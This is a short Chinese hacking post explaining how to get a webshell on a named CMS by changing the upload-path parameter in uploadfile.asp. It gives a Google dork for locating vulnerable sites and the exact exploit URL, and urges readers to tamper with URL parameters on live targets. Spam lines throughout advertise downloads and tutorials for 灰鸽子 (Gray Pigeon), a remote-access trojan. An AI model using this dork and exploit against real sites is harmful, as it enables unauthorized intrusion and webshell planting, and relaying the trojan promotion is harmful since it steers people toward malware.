修改url的参数进行突破上传限制拿webshell 灰鸽子下载www.huigezi.org

admin

修改url的参数进行突破上传限制拿webshell 灰鸽子下载


大家可能都看见过这样的漏洞，这里以疯子的嘉友科技cms上传漏洞为例。

谷歌关键字：inurl:newslist.asp?NodeCode=   灰鸽子使用教程灰鸽子下载exp：
admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上传目录是:/uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath
可以看出对参数PicPath进行了修改，
这种漏洞主要是存在文件名或者路径过滤不严，在实战中多多观察url中的参数，可以尝试进行修改数据。